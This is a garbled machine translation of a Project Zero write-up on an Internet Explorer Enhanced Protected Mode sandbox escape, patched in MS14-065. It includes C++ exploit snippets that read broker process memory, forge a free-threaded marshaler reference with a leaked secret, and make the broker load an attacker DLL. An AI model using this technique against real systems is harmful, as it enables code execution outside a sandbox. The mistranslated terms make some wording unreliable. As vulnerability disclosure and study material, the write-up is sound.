Blast, 2014/12/04 became known
0 x00 preface
By James Forshaw
Original text: Link
This month Microsoft fixed sandbox jump bugs in three different IE enhanced protection mode EPM, which I disclosed in August. Sandboxes were a major focus of Project Zero (which I participated in), and it was a key point in determining whether an attacker could carry out a remote code attack.
All three bugs have been fixed in MS14-065, which you can read here.
Cve-2014-6350 is perhaps the most interesting, not because the BUG is special, but because of the unconventional technique used to exploit it. It is a vulnerability that reads arbitrary memory, but a COM host presents a potential attack. This post will go into more detail on how to implement this vulnerability.
0x01 What is the vulnerability this time?
The vulnerability is caused by the permissions of the IE agent process in enhanced protection mode. This vulnerability does not affect the old protection mode, for reasons I’ll cover later. An untrusted Tab process is running in the EPM sandbox because web content is running in the Tab process. The proxy process is responsible for giving Tab processes the necessary permissions when they need them. The Tab and agent processes interact through DCOM based on IPC communication.
Now that we know how Windows access checks work, we should be able to determine what permissions you want to get when you open a proxy process from the EPM sandbox. Access checking for code in AppContainer is a bit more complicated than the set of mechanisms used in Windows. In addition to the usual access checks, there are two separate additional checks for calculating the maximum permissions that DACL can provide. The first check is generic for the user and group SIDs in the Token, and the second check is based on Compability SIDs. The bitwise sum of these two sets of permissions is the maximum that can be given to the user (ACE is omitted here because it is irrelevant to this discussion).
The first access check matches the current user’s SID, giving full control (marked in red), and the second check matches IE’s Compability SID (marked in blue). After combining the two permissions, Only “read, query” permission. In fact, this time Microsoft fix is read memory permissions.
We can call OpenProcess to pass in the agent process’s PID and request PROCESS_VM_READ permission, so that the kernel returns a handle to the sandbox process. This handle lets you use ReadProcessMemory to read arbitrary memory of the agent process. However, this function will handle invalid memory reads correctly, so there won’t be any crashes.
#! c BOOL ReadMem(DWORD ppid, LPVOID addr, LPVOID result, SIZE_T size) { HANDLE hProcess = OpenProcess(PROCESS_VM_READ, FALSE, ppid); BOOL ret = FALSE; if(hProcess) { ret = ReadProcessMemory(hProcess, addr, result, size, NULL); CloseHandle(hProcess); } return ret; }Copy the code
However, if you are running a Windows 64-bit system and executing this vulnerability from a 32-bit Tab process, things get a little more complicated, because Wow64 comes on and you can’t use ReadProcessMemory directly to read the 64-bit agent’s memory. You can use modules like WOW64ext to get around this limitation, but we’ll leave that out for now.
Wait, look at PM, why isn’t there a problem here? Only one access check is done in PM, so we have full control, but we can’t because of the mandatory robustness check (IL) feature introduced after Microsoft Vista. When one process attempts to open another, the kernel first compares the visitor’s IL with the target process’s system ACL. If the IL of the access process is lower than the robustness level of the target process flag, access is limited to a small subset of the available permissions (for example PROCESS_QUERY_LIMITED_INFORMATION). This will block PROCESS_VM_READ or more dangerous permissions, even if DACL has already checked.
Ok, so let’s look at the application running in the EPM sandbox in The Process Explorer, and we can clearly see that its tokens are at a low robust level (highlighted in the figure below).
Strangely, however, the AppContainer access check looks like it ignores any resources below medium. If a resource passes a DACL check, it is granted permission regardless of IL. This appears to be valid for any secure resource, including files, registry keys. I don’t know why this was designed this way, but it looks like a weak spot, and it wouldn’t have happened if the IL had checked correctly here.
0x02 Implementation Vulnerability
Google event tracking (https://code.google.com/p/google-security-research/issues/detail?id=97) provides the original PoC provides a through proxy system of IPC interface to read arbitrary files. By reading the HMAC key of each process, then the PoC so forge a valid Token, then through CShDocVwBroker: : GetFileHandle to open the file. This is useful for EPM because AppContainer prevents arbitrary files from being read. But, after all, this is just a read, not a write. Ideally we should be able to get out of the Sandbox completely, rather than just leak the contents of some files.
It may seem like a difficult task, but there are actually more techniques to make yourself more secure by using per-process secrets. One technology is my favorite, Windows COM (just kidding). And finally, as long as we can leak the contents of the host process, there is a way to introduce remote COM services to execute code in many processes.
COM Threading model, Suites, and interface Marshaling
COM is used by multiple Windows components, such as Explorer Shell, or native permission services, such as BITS. Each use case has different requirements and limitations, such as the UI requiring all code to run in a single thread, otherwise the operating system will not be happy. A feature class, on the other hand, might be completely thread-safe. To support these requirements, COM supports a set of threading models, which takes the burden off the programmer.
An object in the suite defines how methods in the object are called. There are two types of suites: 1. Single-threaded suites (STA) and multi-threaded suites (MTA). When considering how these suites are called, we need to define the relationship between caller and object. Therefore, we call the caller’s method “client” and the object “server”.
The client suite is determined by the flag passed to CoInitializeEx(which defaults to STA with CoInitialize). The server suite relies on the thread model definition of COM objects in the Windows registry. There are three possible Settings: Free (multi-threaded), Apartment (single-threaded), and Both. If there is a compatible suite between the client and server (only if the server object supports a two-thread model), the function call that calls that object is dereferenced directly to the corresponding function through the object’s virtual function table. However, when STA calls MTA or MTA calls STA we need some way to proxy the call, and COM handles this through marshaling. We can sum it up in the following table.
Marshaling invokes server-side objects through the process’s serialization method. This is especially important in STAs, where everything must be called in a single thread. This is usually done by the Windows Message loop. If your program does not have a window or message loop, STA will create one for you. When a client calls an object in an incompatible suite, it is actually calling a special proxy object. This proxy object knows every COM interface and method that doesn’t work, including which methods require which parameters.
Once the proxy receives the parameters, it serializes them through built-in COM marshaling code and sends them to the server. The server side marshals the parameters with a call and then invokes the appropriate method. Any return value is sent to the client in the same way.
As a result, the model performs as well within processes as it does between processes using DCOM. The same agent marshaling techniques and dispatchers can be used between processes or computers. The only difference is the transmission of marshaled parameters, which is no longer done in-process by a single process, but using TCP through local RPCS, named pipes, and even based on the location of the client and server.
Free-threaded marshaler
Okay, so this is how you leak information in memory? To understand this, I need to introduce something called the Bounded Thread marshaling Model (FTM), which is related to the previous table. When a STA client calls a multithreaded compliant server, it seems inefficient for the client to communicate through this proxy-marshaling process. Why doesn’t he just call the object? This is the problem FTM is trying to solve.
When a COM object is instantiated from an incompatible nested reference, it must return a reference to the object to the caller. This is marshaled in the same way as normal call. In fact, the same mechanism applies when you call a method of an object with a COM object as an argument. The marshalers who use this mechanism to pass references create a unique data stream called OBJREF. This data flow contains all the information the client needs to establish a proxy object and contact the server. This example is a pass-by-reference grammar for COM objects. An example of OBJREF is as follows:
In some scenarios, though, content can be passed by value, such as aborting the broker. When all the code for the specified object in the original client suite needs to be reconstructed, the OBJREF stream can be passed using the pass-by-value grammar. When the unmarshaler reconstructs the object, it creates and initializes a new copy of the original object rather than fetching the proxy. An object can implement its own pass-by-value grammar through the IMarshal interface.
This feature used through FRM can be used to “trick” the operating system. That is, by passing an object in OBJREF that has been serialized in memory, rather than passing a pointer to the original object data. When marshaling, the pointer is deserialized and returned to the caller. It behaves like a “bogus proxy” and allows requests to be sent directly to the original object.
Now it’s understandable if you don’t feel well. Is in-process COM a major security vulnerability because marshaling is different from DCOM in some ways? Fortunately, that’s not the case. FTM not only sends pointer values, but also ensures that de-marshaling of marshaled data is performed only within the same process. It does this by generating a process-by-process 16-byte random value and attaching it to the serialized data. FTM checks this value when deserializing to see if it is the same value saved by the current process. If the two values are different, it rejects deserialization. The premise of this operation is that the attacker cannot guess or decipher the value, so FTM will not de-marshal any pointer that it thinks is wrong. But this threat model doesn’t work when we can read arbitrary memory, which is why we have this vulnerability.
This implementation of FTM is done through the CStaticMarshaler class of comase.dll. On Windows 7 it is ole32.dll’s CFreeMalshaler class. See CstaticMarshaler: : UnmarshallInterface code, roughly as follows:
#! c HRESULT CStaticMarshaler::UnmarshalInterface(IStream* pStm, REFIID riid, void** ppv) { DWORD mshlflags; BYTE secret[16]; ULONGLONG pv; if (! CStaticMarshaler::_fSecretInit) { return E_UNEXPECTED; } pStm->Read(&mshlflags, sizeof(mshlflags)); pStm->Read(&pv, sizeof(p)); pStm->Read(secret, sizeof(secret)); if (SecureCompareBuffer(secret, CStaticMarshaler::_SecretBlock)) { *ppv = (void*)pv; if ((mshlflags == MSHLFLAGS_TABLESTRONG) || (mshlflags == MSHLFLAGS_TABLEWEAK)) { ((IUnknown*)*ppv)->AddRef(); } return S_OK; } else { return E_UNEXPECTED; }}Copy the code
Note that this method checks whether the secret value is already initialized, which prevents an attacker from using an uninitialized secret value (i.e., 0). It is also important to note that you need to use a secure character comparison function to avoid jet lag attacks against secret value checks. This is actually a non-backward porting fix. On Windows 7, string comparisons use the REpe CMDSD instruction, which is not linear time comparisons. So on Windows 7 you might be able to bypass jet lag, although I think that’s a lot of work.
The final structure looks like this:
To execute our code, we need to call the IMarshal interface in our COM object. In particular, we need to perform two functions, Imarshal: : GetUnmarshalClass, when heavy building code, can use clsids it returns to use COM objects. IMarshal: : MarshalInterface, loopholes for packaging suitable pointer value. Here’s a simple example:
#!c
GUID CLSID_FreeThreadedMarshaller =
{ 0x0000033A, 0x0000, 0x0000,
{ 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, } };
HRESULT STDMETHODCALLTYPE CFakeObject::GetUnmarshalClass(
REFIID riid,
void *pv,
DWORD dwDestContext,
void *pvDestContext,
DWORD mshlflags,
CLSID *pCid)
{
memcpy(pCid, &CLSID_FreeThreadedMarshaller,
sizeof(CLSID_FreeThreadedMarshaller));
return S_OK;
}
HRESULT STDMETHODCALLTYPE CFakeObject::MarshalInterface(
IStream *pStm,
REFIID riid,
void *pv,
DWORD dwDestContext,
void *pvDestContext,
DWORD mshlflags)
{
pStm->Write(&_mshlflags, sizeof(_mshlflags), NULL);
pStm->Write(&_pv, sizeof(_pv), NULL);
pStm->Write(&_secret, sizeof(_secret), NULL);
return S_OK;
}
Copy the code
That’s easy enough. Let’s see how we can use it.
0x03 Out of sandbox
With that background, it’s time to get out of the sandbox. To get code out of the sandbox and executed in the broker process, there are three things we need to do:
-
Get the secret value of each FTM process in the mediation process.
-
Construct a dummy virtual table and dummy object pointer.
-
Marshals an object to a broker process to execute code.
Get the secret value of each process
This is easy, we know where the value is in memory, because compase.dll is loaded at the same address in the sandbox process as in the proxy process. Although ASLR was introduced after Vista, the system DLL is only randomized once after startup, so combese.dll is loaded in the same place in each process. This is the weakness of Windows ASLR, especially for local power lifting. But there is a problem if you read this value from a normal IE operation:
Unfortunately FTM hasn’t been initialized yet, which means we can’t use it in a hurry. How do we initialize it in the sandbox process? We just need to let the mediation process do more COM operations, especially those that introduce FTM.
We can use the Open/Save dialog, which is implemented in Explorer Shell (shell32.dll) and of course uses COM. And it’s also a UI, so he will definitely use a STA, but will use free-threaded objects and eventually FTM. So let’s try manually opening a dialog and see what happens.
Good job. The practical reason for choosing it is that we can use the IEShowSaveFileDialog API to launch this dialog in a sandbox process (this API is typically implemented by multiple proxy calls). Obviously this will display some UI, but it doesn’t matter because by the time the dialog is displayed,FTM is already initialized and the user has nothing left to do.
Now we can hardcode some offsets of combese.dll. Of course, you can also dynamically initialize FTM in the sandbox process and find its location through memory search.
Build a fake virtual table
The next challenge is to get our fake virtual table into the proxy process. Since we can read the agent process’s memory, we can definitely use the agent process’s API to perform operations such as heap flooding, but is there an easier way? The IE agent process and the sandbox process have a shared memory section that they use to pass Settings and information. These sections are partially writable to the sandbox process, so all we need to do is find the corresponding mediation process mapping and modify it to what we want. In this example, Sessions\X\BaseNamed\Objects\URLZones_user (X is the Session ID, user is the user name) is used. Although it maps to the proxy process and is writable to the sandbox program, there are still some things that are needed.
We don’t need to brute force to find this section, we need to open the process with the PROCESS_QUERY_INFORMATION permission, and then use VirtualQueryEx to enumerate all mapped memory sections because it returns the size, so we can quickly skip unmapped areas. We can then find a canary value for the write region to determine the release address.
#! c DWORD_PTR FindSharedSection(LPBYTE section, HANDLE hProcess) { // No point starting at lowest value LPBYTE curr = (LPBYTE)0x10000; LPBYTE max = (LPBYTE)0x7FFF0000; memcpy(§ion[0], "ABCD", 4); while (curr < max) { MEMORY_BASIC_INFORMATION basicInfo = { 0 }; if (VirtualQueryEx(hProcess, curr, &basicInfo, sizeof(basicInfo))) { if ((basicInfo.State == MEM_COMMIT) && (basicInfo.Type == MEM_MAPPED) && (basicInfo.RegionSize == 4096)) { CHAR buf[4] = { 0 }; SIZE_T read_len = 0; ReadProcessMemory(hProcess, (LPBYTE)basicInfo.BaseAddress, buf, 4, &read_len); if (memcmp(buf, "ABCD", 4) == 0) { return (DWORD_PTR)basicInfo.BaseAddress; } } curr = (LPBYTE)basicInfo.BaseAddress + basicInfo.RegionSize; } else { break; } } return 0; }Copy the code
Once we have determined where we need to create virtual tables and dummy objects in shared memory, how do we invoke the virtual table? You might think of using an ROP chain, but obviously we don’t need to do that. Since all COM calls use STdCall, all arguments are on the stack, so we can call almost everything through the this pointer.
One attack is to use a function like LoadLibraryW and then build a dummy object that loads a DLL pointing to the relative path. Since the virtual table pointer doesn’t have any NULLCHAR (which makes it difficult to attack in this way on 64-bit systems), we can remove it from the path, which will cause it to load the library. To solve this problem, we can set the lower 16 bits to any random value, and since the higher 16 bits are out of our control, it almost never ends at zero, since Windows’ blank page protection forbids the allocation of addresses lower than 64KB. Finally, our fake object looks something like:
Of course, if you look at the definition of its IUnknown interface, you’ll see that only AddRef and Release in the virtual table of this object have the correct signature. If the proxy process calls QueryInterface on an object, signature is definitely not correct. This is fine on 64-bit systems because of the way the parameters are passed. But on a 32-bit system this would result in stack misalignment, which is not what I want. But that’s fine, if this is a problem there must be a solution, or simply call ExitProcess in the proxy process. However, when we inject an object, we need to choose the appropriate way, if the object may not call it at all, this problem will not occur. So that’s what we’re going to do.
Marshals an object to the broker process
It turns out to be a simple point, too, because all the interfaces of the proxy process used in the sandbox use COM, so all we need to do is find a pointer that only calls IUnknown and give it our dummy marshalling object. To do this, I found that you can request the Shell Document View’s IEBrokerAttach interface, which has only the following function prototype:
HRESULT AttachIEFrameToBroker(IUnknown* pFrame);
To make things perfect before our pointer reaches the mediation process, we preset a frame, so calling this method without a pFrame object will immediately fail. So we don’t have to worry about QueryInterface being called, our bug code will be executed before the function is called, so we don’t care about QueryInterface causing problems.
So, we create our fake object by calling this method. This will cause COM to start marshaling our code into OBJREF objects. It eventually stops at the other end of the IPC channel, where COM begins to de-seal. This calls FTM’s UnmarshalInterface method, and we have successfully found the secret value, so we can happily unpack our dummy object pointer. Eventually, this method will call AddRef on the object, at which point we can also pass mshlFlags to MSHLFLAGS_TABLESTRONG. This will call LoadLibraryW, and its “path” argument is our dummy object, which will load a DLL randomly into the proxy process. All you need to do is play a CALc, and now you’re done.
Eventually, the actual service interruption function is called, but immediately returns an error. A nice sandbox pop out, although it takes a lot of code to support.
0x04 End of Lecture
So I added in the original event tracking (https://code.google.com/p/google-security-research/issues/detail?id=97), a new PoC This can be done on 32-bit Windows 8.1 systems (obviously you can’t patch MS14-065). It doesn’t perform so well on 64-bit Windows 8.1 because the mediation process is 64-bit, although the Tab process may still be 32-bit. If you want it to run on 64-bit, you’ll have to try again, but since you can control RIP, it’s not too difficult. If you want to experiment with the latest machines, there is also a tool in PoC, SetProcessDACL, which can modify a program’s DACL by adding a new IE Compability SID with read permission.
Hopefully this will give you some solutions to similar bugs. Also, don’t complain about COM because it has nothing to do with it. This is just an example of how a relatively harmless arbitrary memory read can eventually break down layers of defenses and evolve into arbitrary code execution and permissions.